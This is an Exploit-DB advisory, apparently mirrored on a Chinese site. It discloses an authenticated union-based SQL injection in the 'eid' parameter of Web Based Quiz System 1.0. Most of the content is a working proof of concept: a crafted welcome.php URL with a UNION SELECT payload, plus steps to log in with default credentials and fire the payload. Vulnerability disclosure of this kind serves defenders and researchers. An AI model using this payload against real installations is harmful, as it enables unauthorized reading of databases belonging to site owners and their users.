Web Based Quiz System 1.0 – ‘eid’ Union Based Sql Injection (Authenticated) - 体验盒子

作者： Deepak Kumar Bharti

日期： 2021-03-04

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/49619/

# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
# Date: 04-03-2021
# Exploit Author: Deepak Kumar Bharti
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software: Web Based Quiz System
# Version: 1.0

# Tested on: Windows 10 Pro
# Union Based Sql Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in Welcome page in quiz section eid parameter affected from this vulnerability.
# URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34

POC:
# go to url http://localhost/login.php
# then you have to login with default creds
# then go to quiz and execute the payload ie:--
http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34